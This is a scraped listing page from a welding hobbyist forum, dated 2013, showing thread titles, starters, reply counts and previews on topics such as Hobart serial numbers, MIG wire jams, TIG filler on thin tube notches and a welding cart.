<!-- END TEMPLATE: forumdisplay_sortarrow --></a></span>
</div>
</div>
<ol id="threads" class="threads">
<!-- BEGIN TEMPLATE: threadbit -->
<li class="threadbit " id="thread_117881">
<div class="rating0 nonsticky">
<div class="threadinfo" title="I have a Hobart Streamliner Looking for a year of build Serial SBW 936 Does anyone have a list back this far? Thanks Brad">
<!-- status icon block -->
<a class="threadstatus" rel="vB::AJAX" ></a>
<!-- title / author block -->
<div class="inner">
<h3 class="threadtitle">
<a class="title" href="showthreada6aa.html?117881-Hobart-serial" id="thread_title_117881">Hobart serial #</a>
</h3>
<div class="threadmeta">
<div class="author">
<span class="label">Started by <a href="member7594.html?67773-Brad-M" class="username understate" title="Started by Brad M on Yesterday 03:08 PM">Brad M</a>, Yesterday 03:08 PM</span>
<!-- iconinfo -->
<div class="threaddetails td">
<div class="threaddetailicons">
</div>
</div>
</div>
</div>
</div>
</div>
<!-- threadstats -->
<ul class="threadstats td alt" title="">
<li>Replies: <a href="miscd0ea.html?do=whoposted&t=117881" onclick="who(117881); return false;" class="understate">5</a></li>
<li>Views: 45</li>
<li class="hidden">Rating0 / 5</li>
</ul>
<!-- lastpost -->
<dl class="threadlastpost td">
<dt class="lastpostby hidden">Last Post By</dt>
<dd><!-- BEGIN TEMPLATE: memberaction_dropdown -->
<div class="popupmenu memberaction">
<a class="username offline popupctrl" href="member7594.html?67773-Brad-M" title="Brad M is offline"><strong>Brad M</strong></a>
<ul class="popupbody popuphover memberaction_body">
<li class="left">
<a href="member7594.html?67773-Brad-M" class="siteicon_profile">
View Profile
</a>
</li>
<li class="right">
<a href="search009d.html?do=finduser&userid=67773&contenttype=vBForum_Post&showposts=1" class="siteicon_forum" rel="nofollow">
View Forum Posts
</a>
</li>
</ul>
</div>
<!-- END TEMPLATE: memberaction_dropdown --></dd>
<dd>Today, <span class="time">04:46 AM</span>
<a href="showthread54b9.html?117881-Hobart-serial&p=509176#post509176" class="lastpostdate understate" title="Go to last post"><img src="images/buttons/lastpost-right.html" alt="Go to last post" /></a>
</dd>
</dl>
</div>
</li>
<!-- END TEMPLATE: threadbit --><!-- BEGIN TEMPLATE: threadbit -->
<li class="threadbit hot" id="thread_117880">
<div class="rating0 nonsticky">
<div class="threadinfo" title="While using my HH210 I ran out of wire. I had about two inches sticking out of the gun so I tried to pull it through. It would not come and I finally broke the end of the wire off that was sticking out so I tried to pull it out from the other end with no luck and finally broke that piece off....">
<!-- status icon block -->
<a class="threadstatus" rel="vB::AJAX" ></a>
<!-- title / author block -->
<div class="inner">
<h3 class="threadtitle">
<a class="title" href="showthread6bd9.html?117880-Have-troubles" id="thread_title_117880">Have troubles</a>
</h3>
<div class="threadmeta">
<div class="author">
<span class="label">Started by <a href="membera6dc.html?3800-Graham-Brown" class="username understate" title="Started by Graham Brown on 08-24-2013 05:26 PM">Graham Brown</a>, 08-24-2013 05:26 PM</span>
<dl class="pagination" id="pagination_threadbit_117880">
<dt class="label">2 Pages <span class="separator">•</span></dt>
<dd>
<!-- BEGIN TEMPLATE: threadbit_pagelink -->
<span><a href="showthread6bd9.html?117880-Have-troubles">1</a></span>
<!-- END TEMPLATE: threadbit_pagelink --> <!-- BEGIN TEMPLATE: threadbit_pagelink -->
<span><a href="showthread163a.html?117880-Have-troubles/page2">2</a></span>
<!-- END TEMPLATE: threadbit_pagelink -->
</dd>
</dl>
<!-- iconinfo -->
<div class="threaddetails td">
<div class="threaddetailicons">
</div>
</div>
</div>
</div>
</div>
</div>
<!-- threadstats -->
<ul class="threadstats td alt" title="">
<li>Replies: <a href="misccc85.html?do=whoposted&t=117880" onclick="who(117880); return false;" class="understate">22</a></li>
<li>Views: 338</li>
<li class="hidden">Rating0 / 5</li>
</ul>
<!-- lastpost -->
<dl class="threadlastpost td">
<dt class="lastpostby hidden">Last Post By</dt>
<dd><!-- BEGIN TEMPLATE: memberaction_dropdown -->
<div class="popupmenu memberaction">
<a class="username offline popupctrl" href="member6cb6.html?16857-mikecwik" title="mikecwik is offline"><strong>mikecwik</strong></a>
<ul class="popupbody popuphover memberaction_body">
<li class="left">
<a href="member6cb6.html?16857-mikecwik" class="siteicon_profile">
View Profile
</a>
</li>
<li class="right">
<a href="searchac5d.html?do=finduser&userid=16857&contenttype=vBForum_Post&showposts=1" class="siteicon_forum" rel="nofollow">
View Forum Posts
</a>
</li>
</ul>
</div>
<!-- END TEMPLATE: memberaction_dropdown --></dd>
<dd>Yesterday, <span class="time">07:23 PM</span>
<a href="showthreadfae5.html?117880-Have-troubles&p=509161#post509161" class="lastpostdate understate" title="Go to last post"><img src="images/buttons/lastpost-right.html" alt="Go to last post" /></a>
</dd>
</dl>
</div>
</li>
<!-- END TEMPLATE: threadbit --><!-- BEGIN TEMPLATE: threadbit -->
<li class="threadbit hot" id="thread_117873">
<div class="rating0 nonsticky">
<div class="threadinfo" title="i do a lot of building with 1" .065 RT, mild steel, and have numerous 90 degree notched joints where a notched stanchion sits on a straight length of tube. I have always MIG welded these but want smaller welds so I tired my TIG. Welds are much better looking for sure but adding filler is tricky...">
<!-- status icon block -->
<a class="threadstatus" rel="vB::AJAX" ></a>
<!-- title / author block -->
<div class="inner">
<h3 class="threadtitle">
<a class="title" href="showthread9f1d.html?117873-Filler-or-no-filler-on-90-degree-tube-notches-thin-stuff" id="thread_title_117873">Filler or no filler on 90 degree tube notches, thin stuff</a>
</h3>
<div class="threadmeta">
<div class="author">
<span class="label">Started by <a href="member9124.html?22629-flipflops" class="username understate" title="Started by flipflops on 08-22-2013 11:38 AM">flipflops</a>, 08-22-2013 11:38 AM</span>
<!-- iconinfo -->
<div class="threaddetails td">
<div class="threaddetailicons">
</div>
</div>
</div>
</div>
</div>
</div>
<!-- threadstats -->
<ul class="threadstats td alt" title="">
<li>Replies: <a href="misc6958.html?do=whoposted&t=117873" onclick="who(117873); return false;" class="understate">7</a></li>
<li>Views: 157</li>
<li class="hidden">Rating0 / 5</li>
</ul>
<!-- lastpost -->
<dl class="threadlastpost td">
<dt class="lastpostby hidden">Last Post By</dt>
<dd><!-- BEGIN TEMPLATE: memberaction_dropdown -->
<div class="popupmenu memberaction">
<a class="username offline popupctrl" href="member9124.html?22629-flipflops" title="flipflops is offline"><strong>flipflops</strong></a>
<ul class="popupbody popuphover memberaction_body">
<li class="left">
<a href="member9124.html?22629-flipflops" class="siteicon_profile">
View Profile
</a>
</li>
<li class="right">
<a href="search5415.html?do=finduser&userid=22629&contenttype=vBForum_Post&showposts=1" class="siteicon_forum" rel="nofollow">
View Forum Posts
</a>
</li>
</ul>
</div>
<!-- END TEMPLATE: memberaction_dropdown --></dd>
<dd>08-23-2013, <span class="time">03:02 PM</span>
<a href="showthreadca48.html?117873-Filler-or-no-filler-on-90-degree-tube-notches-thin-stuff&p=509120#post509120" class="lastpostdate understate" title="Go to last post"><img src="images/buttons/lastpost-right.html" alt="Go to last post" /></a>
</dd>
</dl>
</div>
</li>
<!-- END TEMPLATE: threadbit --><!-- BEGIN TEMPLATE: threadbit -->
<li class="threadbit " id="thread_117866">
<div class="rating0 nonsticky">
<div class="threadinfo" title="Decided yesterday, it worked fine as a stick-welder, just too much damage
to all the components involved in "tig". And the corrosive damage to the Cabinette.
The main reactor transformer complete with it's leads right out to the terminatios
is in good shape. I DID NOT cut or dissfigure any...">
<!-- status icon block -->
<a class="threadstatus" rel="vB::AJAX" ></a>
<!-- title / author block -->
<div class="inner">
<h3 class="threadtitle">
<a class="title" href="showthread790d.html?117866-DialArc-H-F-is-parted-out" id="thread_title_117866">DialArc H.F. is parted out.</a>
</h3>
<div class="threadmeta">
<div class="author">
<span class="label">Started by <a href="member9e20.html?6098-vicegrip" class="username understate" title="Started by vicegrip on 08-18-2013 11:44 AM">vicegrip</a>, 08-18-2013 11:44 AM</span>
<!-- iconinfo -->
<div class="threaddetails td">
<div class="threaddetailicons">
</div>
</div>
</div>
</div>
</div>
</div>
<!-- threadstats -->
<ul class="threadstats td alt" title="">
<li>Replies: <a href="misc33d7.html?do=whoposted&t=117866" onclick="who(117866); return false;" class="understate">1</a></li>
<li>Views: 83</li>
<li class="hidden">Rating0 / 5</li>
</ul>
<!-- lastpost -->
<dl class="threadlastpost td">
<dt class="lastpostby hidden">Last Post By</dt>
<dd><!-- BEGIN TEMPLATE: memberaction_dropdown -->
<div class="popupmenu memberaction">
<a class="username offline popupctrl" href="member9e20.html?6098-vicegrip" title="vicegrip is offline"><strong>vicegrip</strong></a>
<ul class="popupbody popuphover memberaction_body">
<li class="left">
<a href="member9e20.html?6098-vicegrip" class="siteicon_profile">
View Profile
</a>
</li>
<li class="right">
<a href="searche5e0.html?do=finduser&userid=6098&contenttype=vBForum_Post&showposts=1" class="siteicon_forum" rel="nofollow">
View Forum Posts
</a>
</li>
</ul>
</div>
<!-- END TEMPLATE: memberaction_dropdown --></dd>
<dd>08-23-2013, <span class="time">02:13 PM</span>
<a href="showthread3b57.html?117866-DialArc-H-F-is-parted-out&p=509119#post509119" class="lastpostdate understate" title="Go to last post"><img src="images/buttons/lastpost-right.html" alt="Go to last post" /></a>
</dd>
</dl>
</div>
</li>
<!-- END TEMPLATE: threadbit --><!-- BEGIN TEMPLATE: threadbit -->
<li class="threadbit hot" id="thread_117827">
<div class="rating0 nonsticky">
<div class="threadinfo" title="Has anyone ever stick welded one of these. I think it's stainless even though a magnet stuck to it. Anyhow, I had a time getting out welded up with a 225 a/c welder last night. I used a 7018 first add it looked like bubble gum so I put a stainless rod in there. I think a 304. Anyhow, it seemed to...">
<!-- status icon block -->
<a class="threadstatus" rel="vB::AJAX" ></a>
<!-- title / author block -->
<div class="inner">
<h3 class="threadtitle">
<a class="title" href="showthreada394.html?117827-Stick-welding-a-catalytic-converter" id="thread_title_117827">Stick welding a catalytic converter</a>
</h3>
<div class="threadmeta">
<div class="author">
<span class="label">Started by <a href="memberffb7.html?13656-mildew" class="username understate" title="Started by mildew on 08-01-2013 04:10 PM">mildew</a>, 08-01-2013 04:10 PM</span>
<dl class="pagination" id="pagination_threadbit_117827">
<dt class="label">2 Pages <span class="separator">•</span></dt>
<dd>
<!-- BEGIN TEMPLATE: threadbit_pagelink -->
<span><a href="showthreada394.html?117827-Stick-welding-a-catalytic-converter">1</a></span>
<!-- END TEMPLATE: threadbit_pagelink --> <!-- BEGIN TEMPLATE: threadbit_pagelink -->
<span><a href="showthread3593.html?117827-Stick-welding-a-catalytic-converter/page2">2</a></span>
<!-- END TEMPLATE: threadbit_pagelink -->
</dd>
</dl>
<!-- iconinfo -->
<div class="threaddetails td">
<div class="threaddetailicons">
</div>
</div>
</div>
</div>
</div>
</div>
<!-- threadstats -->
<ul class="threadstats td alt" title="">
<li>Replies: <a href="misc74c3.html?do=whoposted&t=117827" onclick="who(117827); return false;" class="understate">28</a></li>
<li>Views: 942</li>
<li class="hidden">Rating0 / 5</li>
</ul>
<!-- lastpost -->
<dl class="threadlastpost td">
<dt class="lastpostby hidden">Last Post By</dt>
<dd><!-- BEGIN TEMPLATE: memberaction_dropdown -->
<div class="popupmenu memberaction">
<a class="username offline popupctrl" href="memberffb7.html?13656-mildew" title="mildew is offline"><strong>mildew</strong></a>
<ul class="popupbody popuphover memberaction_body">
<li class="left">
<a href="memberffb7.html?13656-mildew" class="siteicon_profile">
View Profile
</a>
</li>
<li class="right">
<a href="searchd343.html?do=finduser&userid=13656&contenttype=vBForum_Post&showposts=1" class="siteicon_forum" rel="nofollow">
View Forum Posts
</a>
</li>
</ul>
</div>
<!-- END TEMPLATE: memberaction_dropdown --></dd>
<dd>08-21-2013, <span class="time">08:42 AM</span>
<a href="showthread7a53.html?117827-Stick-welding-a-catalytic-converter&p=509072#post509072" class="lastpostdate understate" title="Go to last post"><img src="images/buttons/lastpost-right.html" alt="Go to last post" /></a>
</dd>
</dl>
</div>
</li>
<!-- END TEMPLATE: threadbit --><!-- BEGIN TEMPLATE: threadbit -->
<li class="threadbit hot attachments" id="thread_117749">
<div class="rating0 nonsticky">
<div class="threadinfo" title="Zen of course meaning ballance of opposing forces, or making said forces
into a workable "Dynamic".
I have larger plans for my round welding table. But for now I need it where it's going to be
and I need it for simple welding. I'm setting my garage back up to be a work area,
not the emergency...">
<!-- status icon block -->
<a class="threadstatus" rel="vB::AJAX" ></a>
<!-- title / author block -->
<div class="inner">
<h3 class="threadtitle">
<a class="title" href="showthreadaacd.html?117749-More-quot-Zen-quot-of-metalworking" id="thread_title_117749">More "Zen" of metalworking,</a>
</h3>
<div class="threadmeta">
<div class="author">
<span class="label">Started by <a href="member9e20.html?6098-vicegrip" class="username understate" title="Started by vicegrip on 07-12-2013 12:40 PM">vicegrip</a>, 07-12-2013 12:40 PM</span>
<dl class="pagination" id="pagination_threadbit_117749">
<dt class="label">3 Pages <span class="separator">•</span></dt>
<dd>
<!-- BEGIN TEMPLATE: threadbit_pagelink -->
<span><a href="showthreadaacd.html?117749-More-quot-Zen-quot-of-metalworking">1</a></span>
<!-- END TEMPLATE: threadbit_pagelink --> <!-- BEGIN TEMPLATE: threadbit_pagelink -->
<span><a href="showthreade6e2.html?117749-More-quot-Zen-quot-of-metalworking/page2">2</a></span>
<!-- END TEMPLATE: threadbit_pagelink --> <!-- BEGIN TEMPLATE: threadbit_pagelink -->
<span><a href="showthreadc8c0.html?117749-More-quot-Zen-quot-of-metalworking/page3">3</a></span>
<!-- END TEMPLATE: threadbit_pagelink -->
</dd>
</dl>
<!-- iconinfo -->
<div class="threaddetails td">
<div class="threaddetailicons">
<a href="javascript://" onclick="attachments(117749); return false"> <img src="images/misc/paperclip.png" border="0" alt="4 Attachment(s)" /></a>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- threadstats -->
<ul class="threadstats td alt" title="">
<li>Replies: <a href="misc21a1.html?do=whoposted&t=117749" onclick="who(117749); return false;" class="understate">38</a></li>
<li>Views: 1,006</li>
<li class="hidden">Rating0 / 5</li>
</ul>
<!-- lastpost -->
<dl class="threadlastpost td">
<dt class="lastpostby hidden">Last Post By</dt>
<dd><!-- BEGIN TEMPLATE: memberaction_dropdown -->
<div class="popupmenu memberaction">
<a class="username offline popupctrl" href="member31fd.html?4946-usmcpop" title="usmcpop is offline"><strong>usmcpop</strong></a>
<ul class="popupbody popuphover memberaction_body">
<li class="left">
<a href="member31fd.html?4946-usmcpop" class="siteicon_profile">
View Profile
</a>
</li>
<li class="right">
<a href="search0c43.html?do=finduser&userid=4946&contenttype=vBForum_Post&showposts=1" class="siteicon_forum" rel="nofollow">
View Forum Posts
</a>
</li>
</ul>
</div>
<!-- END TEMPLATE: memberaction_dropdown --></dd>
<dd>08-20-2013, <span class="time">01:31 PM</span>
<a href="showthread2a00.html?117749-More-quot-Zen-quot-of-metalworking&p=509059#post509059" class="lastpostdate understate" title="Go to last post"><img src="images/buttons/lastpost-right.html" alt="Go to last post" /></a>
</dd>
</dl>
</div>
</li>
<!-- END TEMPLATE: threadbit --><!-- BEGIN TEMPLATE: threadbit -->
<li class="threadbit hot" id="thread_117850">
<div class="rating0 nonsticky">
<div class="threadinfo" title="Havn't been to active on the forums lately but browsing around I have not found any recent posts by Rocky D or Hawk">
<!-- status icon block -->
<a class="threadstatus" rel="vB::AJAX" ></a>
<!-- title / author block -->
<div class="inner">
<h3 class="threadtitle">
<a class="title" href="showthread9c85.html?117850-Has-Anyone-heared-from-Rocky-D" id="thread_title_117850">Has Anyone heared from Rocky D</a>
</h3>
<div class="threadmeta">
<div class="author">
<span class="label">Started by <a href="membereb92.html?43-harold" class="username understate" title="Started by harold on 08-12-2013 04:18 PM">harold</a>, 08-12-2013 04:18 PM</span>
<!-- iconinfo -->
<div class="threaddetails td">
<div class="threaddetailicons">
</div>
</div>
</div>
</div>
</div>
</div>
<!-- threadstats -->
<ul class="threadstats td alt" title="">
<li>Replies: <a href="misca449.html?do=whoposted&t=117850" onclick="who(117850); return false;" class="understate">6</a></li>
<li>Views: 253</li>
<li class="hidden">Rating0 / 5</li>
</ul>
<!-- lastpost -->
<dl class="threadlastpost td">
<dt class="lastpostby hidden">Last Post By</dt>
<dd><!-- BEGIN TEMPLATE: memberaction_dropdown -->
<div class="popupmenu memberaction">
<a class="username offline popupctrl" href="member36b3.html?301-cope" title="cope is offline"><strong>cope</strong></a>
<ul class="popupbody popuphover memberaction_body">
<li class="left">
<a href="member36b3.html?301-cope" class="siteicon_profile">
View Profile
</a>
</li>
<li class="right">
<a href="search1271.html?do=finduser&userid=301&contenttype=vBForum_Post&showposts=1" class="siteicon_forum" rel="nofollow">
View Forum Posts
</a>
</li>
</ul>
</div>
<!-- END TEMPLATE: memberaction_dropdown --></dd>
<dd>08-13-2013, <span class="time">03:11 PM</span>
<a href="showthreadeee4.html?117850-Has-Anyone-heared-from-Rocky-D&p=508914#post508914" class="lastpostdate understate" title="Go to last post"><img src="images/buttons/lastpost-right.html" alt="Go to last post" /></a>
</dd>
</dl>
</div>
</li>
<!-- END TEMPLATE: threadbit --><!-- BEGIN TEMPLATE: threadbit -->
<li class="threadbit hot" id="thread_117844">
<div class="rating0 nonsticky">
<div class="threadinfo" title="I rarely get into such duldrums that I acknowledge futillity.
BUT!
When I do, I think of this fellow.
A few times I've had an experience like this.
https://www.youtube.com/watch?v=tTDn604ipYY">
<!-- status icon block -->
<a class="threadstatus" rel="vB::AJAX" ></a>
<!-- title / author block -->
<div class="inner">
<h3 class="threadtitle">
<a class="title" href="showthread2fe8.html?117844-Motivation-Theripy-!" id="thread_title_117844">Motivation Theripy !</a>
</h3>
<div class="threadmeta">
<div class="author">
<span class="label">Started by <a href="member9e20.html?6098-vicegrip" class="username understate" title="Started by vicegrip on 08-09-2013 01:34 AM">vicegrip</a>, 08-09-2013 01:34 AM</span>
<!-- iconinfo -->
<div class="threaddetails td">
<div class="threaddetailicons">
</div>
</div>
</div>
</div>
</div>
</div>
<!-- threadstats -->
<ul class="threadstats td alt" title="">
<li>Replies: <a href="misc5c7d.html?do=whoposted&t=117844" onclick="who(117844); return false;" class="understate">8</a></li>
<li>Views: 260</li>
<li class="hidden">Rating0 / 5</li>
</ul>
<!-- lastpost -->
<dl class="threadlastpost td">
<dt class="lastpostby hidden">Last Post By</dt>
<dd><!-- BEGIN TEMPLATE: memberaction_dropdown -->
<div class="popupmenu memberaction">
<a class="username offline popupctrl" href="member9e20.html?6098-vicegrip" title="vicegrip is offline"><strong>vicegrip</strong></a>
<ul class="popupbody popuphover memberaction_body">
<li class="left">
<a href="member9e20.html?6098-vicegrip" class="siteicon_profile">
View Profile
</a>
</li>
<li class="right">
<a href="searche5e0.html?do=finduser&userid=6098&contenttype=vBForum_Post&showposts=1" class="siteicon_forum" rel="nofollow">
View Forum Posts
</a>
</li>
</ul>
</div>
<!-- END TEMPLATE: memberaction_dropdown --></dd>
<dd>08-10-2013, <span class="time">06:39 PM</span>
<a href="showthreada565.html?117844-Motivation-Theripy-!&p=508838#post508838" class="lastpostdate understate" title="Go to last post"><img src="images/buttons/lastpost-right.html" alt="Go to last post" /></a>
</dd>
</dl>
</div>
</li>
<!-- END TEMPLATE: threadbit --><!-- BEGIN TEMPLATE: threadbit -->
<li class="threadbit hot attachments" id="thread_117834">
<div class="rating0 nonsticky">
<div class="threadinfo" title="I've been following articals on Sail-less Wind-driven ships since my teens.
Magnus masts, turbine-collectors etc. etc.
I was watching footage of a large flag being blow to ribbons.
That ocsilating serpentine motion, gave me the following notion.
The ideal wind-ship can sail directly into...">
<!-- status icon block -->
<a class="threadstatus" rel="vB::AJAX" ></a>
<!-- title / author block -->
<div class="inner">
<h3 class="threadtitle">
<a class="title" href="showthread201f.html?117834-Wind-to-Electric-ship-drive" id="thread_title_117834">Wind to Electric ship drive??</a>
</h3>
<div class="threadmeta">
<div class="author">
<span class="label">Started by <a href="member9e20.html?6098-vicegrip" class="username understate" title="Started by vicegrip on 08-04-2013 11:18 PM">vicegrip</a>, 08-04-2013 11:18 PM</span>
<!-- iconinfo -->
<div class="threaddetails td">
<div class="threaddetailicons">
<a href="javascript://" onclick="attachments(117834); return false"> <img src="images/misc/paperclip.png" border="0" alt="1 Attachment(s)" /></a>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- threadstats -->
<ul class="threadstats td alt" title="">
<li>Replies: <a href="misc0a6b.html?do=whoposted&t=117834" onclick="who(117834); return false;" class="understate">6</a></li>
<li>Views: 224</li>
<li class="hidden">Rating0 / 5</li>
</ul>
<!-- lastpost -->
<dl class="threadlastpost td">
<dt class="lastpostby hidden">Last Post By</dt>
<dd><!-- BEGIN TEMPLATE: memberaction_dropdown -->
<div class="popupmenu memberaction">
<a class="username offline popupctrl" href="member9e20.html?6098-vicegrip" title="vicegrip is offline"><strong>vicegrip</strong></a>
<ul class="popupbody popuphover memberaction_body">
<li class="left">
<a href="member9e20.html?6098-vicegrip" class="siteicon_profile">
View Profile
</a>
</li>
<li class="right">
<a href="searche5e0.html?do=finduser&userid=6098&contenttype=vBForum_Post&showposts=1" class="siteicon_forum" rel="nofollow">
View Forum Posts
</a>
</li>
</ul>
</div>
<!-- END TEMPLATE: memberaction_dropdown --></dd>
<dd>08-08-2013, <span class="time">02:57 AM</span>
<a href="showthreadb5af.html?117834-Wind-to-Electric-ship-drive&p=508808#post508808" class="lastpostdate understate" title="Go to last post"><img src="images/buttons/lastpost-right.html" alt="Go to last post" /></a>
</dd>
</dl>
</div>
</li>
<!-- END TEMPLATE: threadbit --><!-- BEGIN TEMPLATE: threadbit -->
<li class="threadbit hot attachments" id="thread_116936">
<div class="rating0 nonsticky">
<div class="threadinfo" title="Bought at a yard sale a new Harbor Frieght cart (3 tier), I have the Hobart 140 which fits perfectly for me on this particular cart but the side door on my unit hits the side rail of the cart when i try to open it, anyone have a nice remedy to resolve this issue?, maybe a piece of mill jamb belt...">
<!-- status icon block -->
<a class="threadstatus" rel="vB::AJAX" ></a>
<!-- title / author block -->
<div class="inner">
<h3 class="threadtitle">
<a class="title" href="showthread8838.html?116936-Weld-Cart-Question-Pics" id="thread_title_116936">Weld Cart Question /Pics</a>
</h3>
<div class="threadmeta">
<div class="author">
<span class="label">Started by <a href="memberc3a9.html?14706-HotZone" class="username understate" title="Started by HotZone on 07-05-2013 03:02 PM">HotZone</a>, 07-05-2013 03:02 PM</span>
<!-- iconinfo -->
<div class="threaddetails td">
<div class="threaddetailicons">
<a href="javascript://" onclick="attachments(116936); return false"> <img src="images/misc/paperclip.png" border="0" alt="4 Attachment(s)" /></a>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- threadstats -->
<ul class="threadstats td alt" title="">
<li>Replies: <a href="misca957.html?do=whoposted&t=116936" onclick="who(116936); return false;" class="understate">9</a></li>
<li>Views: 635</li>
<li class="hidden">Rating0 / 5</li>
</ul>
<!-- lastpost -->
<dl class="threadlastpost td">
<dt class="lastpostby hidden">Last Post By</dt>
<dd><!-- BEGIN TEMPLATE: memberaction_dropdown -->
<div class="popupmenu memberaction">
<a class="username offline popupctrl" href="memberbd82.html?97437-Henrymac" title="Henrymac is offline"><strong>Henrymac</strong></a>
<ul class="popupbody popuphover memberaction_body">
<li class="left">
<a href="memberbd82.html?97437-Henrymac" class="siteicon_profile">
View Profile
</a>
</li>
<li class="right">
<a href="searchad4a.html?do=finduser&userid=97437&contenttype=vBForum_Post&showposts=1" class="siteicon_forum" rel="nofollow">
View Forum Posts
</a>
</li>
</ul>
</div>
<!-- END TEMPLATE: memberaction_dropdown --></dd>
<dd>08-05-2013, <span class="time">01:58 AM</span>
<a href="showthread11e9.html?116936-Weld-Cart-Question-Pics&p=508739#post508739" class="lastpostdate understate" title="Go to last post"><img src="images/buttons/lastpost-right.html" alt="Go to last post" /></a>
</dd>
</dl>
</div>
</li>
<!-- END TEMPLATE: threadbit --><!-- BEGIN TEMPLATE: threadbit -->
<li class="threadbit hot attachments" id="thread_117797">
<div class="rating0 nonsticky">
<div class="threadinfo" title="What's with the brown soot and all the spatter? I thought mig was cleaner than this.. 210mvp, 75/25 20cfh using a flowmeter not a gauge, 3/16" cleaned to shiny metal. .030" htp wire. Using recommended voltage setting 5, with 5 less on the wfs dial than recommended, bead was too tall using rec...">
<!-- status icon block -->
<a class="threadstatus" rel="vB::AJAX" ></a>
<!-- title / author block -->
<div class="inner">
<h3 class="threadtitle">
<a class="title" href="showthreadf131.html?117797-What-s-your-opinions-on-this-weld" id="thread_title_117797">What's your opinions on this weld?</a>
</h3>
<div class="threadmeta">
<div class="author">
<span class="label">Started by <a href="member4ab1.html?91203-jshultz78" class="username understate" title="Started by jshultz78 on 07-21-2013 07:46 PM">jshultz78</a>, 07-21-2013 07:46 PM</span>
<dl class="pagination" id="pagination_threadbit_117797">
<dt class="label">3 Pages <span class="separator">•</span></dt>
<dd>
<!-- BEGIN TEMPLATE: threadbit_pagelink -->
<span><a href="showthreadf131.html?117797-What-s-your-opinions-on-this-weld">1</a></span>
<!-- END TEMPLATE: threadbit_pagelink --> <!-- BEGIN TEMPLATE: threadbit_pagelink -->
<span><a href="showthread9e25.html?117797-What-s-your-opinions-on-this-weld/page2">2</a></span>
<!-- END TEMPLATE: threadbit_pagelink --> <!-- BEGIN TEMPLATE: threadbit_pagelink -->
<span><a href="showthread12f8.html?117797-What-s-your-opinions-on-this-weld/page3">3</a></span>
<!-- END TEMPLATE: threadbit_pagelink -->
</dd>
</dl>
<!-- iconinfo -->
<div class="threaddetails td">
<div class="threaddetailicons">
<a href="javascript://" onclick="attachments(117797); return false"> <img src="images/misc/paperclip.png" border="0" alt="4 Attachment(s)" /></a>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- threadstats -->
<ul class="threadstats td alt" title="">
<li>Replies: <a href="misc9655.html?do=whoposted&t=117797" onclick="who(117797); return false;" class="understate">32</a></li>
<li>Views: 1,157</li>
<li class="hidden">Rating0 / 5</li>
</ul>
<!-- lastpost -->
<dl class="threadlastpost td">
<dt class="lastpostby hidden">Last Post By</dt>
<dd><!-- BEGIN TEMPLATE: memberaction_dropdown -->
<div class="popupmenu memberaction">
<a class="username offline popupctrl" href="membera92a.html?604-Northweldor" title="Northweldor is offline"><strong>Northweldor</strong></a>
<ul class="popupbody popuphover memberaction_body">
<li class="left">
<a href="membera92a.html?604-Northweldor" class="siteicon_profile">
View Profile
</a>
</li>
<li class="right">
<a href="searchc639.html?do=finduser&userid=604&contenttype=vBForum_Post&showposts=1" class="siteicon_forum" rel="nofollow">
View Forum Posts
</a>
</li>
</ul>
</div>
<!-- END TEMPLATE: memberaction_dropdown --></dd>
<dd>08-02-2013, <span class="time">07:58 AM</span>
<a href="showthread9da1.html?117797-What-s-your-opinions-on-this-weld&p=508642#post508642" class="lastpostdate understate" title="Go to last post"><img src="images/buttons/lastpost-right.html" alt="Go to last post" /></a>
</dd>
</dl>
</div>
</li>
<!-- END TEMPLATE: threadbit --><!-- BEGIN TEMPLATE: threadbit -->
<li class="threadbit hot" id="thread_117815">
<div class="rating0 nonsticky">
<div class="threadinfo" title="First of all, I'm not an expert-----I just got a MIG certificate from a local college (2 semester course) and own a small Hobart Handler, but have done a lot of welding on various projects since I've had it. A friend who knows this recently called looking for 'some basic instruction' on how to...">
<!-- status icon block -->
<a class="threadstatus" rel="vB::AJAX" ></a>
<!-- title / author block -->
<div class="inner">
<h3 class="threadtitle">
<a class="title" href="showthreadd384.html?117815-Friend-looking-for-free-welding-instruction-what-would-you-do" id="thread_title_117815">Friend looking for free welding instruction----what would you do?</a>
</h3>
<div class="threadmeta">
<div class="author">
<span class="label">Started by <a href="member4b79.html?30327-MarkG" class="username understate" title="Started by MarkG on 07-30-2013 10:41 AM">MarkG</a>, 07-30-2013 10:41 AM</span>
<!-- iconinfo -->
<div class="threaddetails td">
<div class="threaddetailicons">
</div>
</div>
</div>
</div>
</div>
</div>
<!-- threadstats -->
<ul class="threadstats td alt" title="">
<li>Replies: <a href="misc35ef.html?do=whoposted&t=117815" onclick="who(117815); return false;" class="understate">14</a></li>
<li>Views: 416</li>
<li class="hidden">Rating0 / 5</li>
</ul>
<!-- lastpost -->
<dl class="threadlastpost td">
<dt class="lastpostby hidden">Last Post By</dt>
<dd><!-- BEGIN TEMPLATE: memberaction_dropdown -->
<div class="popupmenu memberaction">
<a class="username offline popupctrl" href="member9e20.html?6098-vicegrip" title="vicegrip is offline"><strong>vicegrip</strong></a>
<ul class="popupbody popuphover memberaction_body">
<li class="left">
<a href="member9e20.html?6098-vicegrip" class="siteicon_profile">
View Profile
</a>
</li>
<li class="right">
<a href="searche5e0.html?do=finduser&userid=6098&contenttype=vBForum_Post&showposts=1" class="siteicon_forum" rel="nofollow">
View Forum Posts
</a>
</li>
</ul>
</div>
<!-- END TEMPLATE: memberaction_dropdown --></dd>
<dd>08-01-2013, <span class="time">12:41 AM</span>
<a href="showthread12d2.html?117815-Friend-looking-for-free-welding-instruction-what-would-you-do&p=508612#post508612" class="lastpostdate understate" title="Go to last post"><img src="images/buttons/lastpost-right.html" alt="Go to last post" /></a>
</dd>
</dl>
</div>
</li>
<!-- END TEMPLATE: threadbit --><!-- BEGIN TEMPLATE: threadbit -->
<li class="threadbit " id="thread_117826">
<div class="rating0 nonsticky">
<div class="threadinfo" title="http://www.millerwelds.com/products/tig/product.php?model=M00488
this seems to be its replacement. interface seems to have as many controls. duty cycle is about the same at 125 amps. seems a little more complicated. less amp draw. portable, 110/220 mvp. all at around $188 more...
I swore the...">
<!-- status icon block -->
<a class="threadstatus" rel="vB::AJAX" ></a>
<!-- title / author block -->
<div class="inner">
<h3 class="threadtitle">
<a class="title" href="showthreadb68f.html?117826-syncrowave-200-phased-out-by-miller" id="thread_title_117826">syncrowave 200 phased out by miller?</a>
</h3>
<div class="threadmeta">
<div class="author">
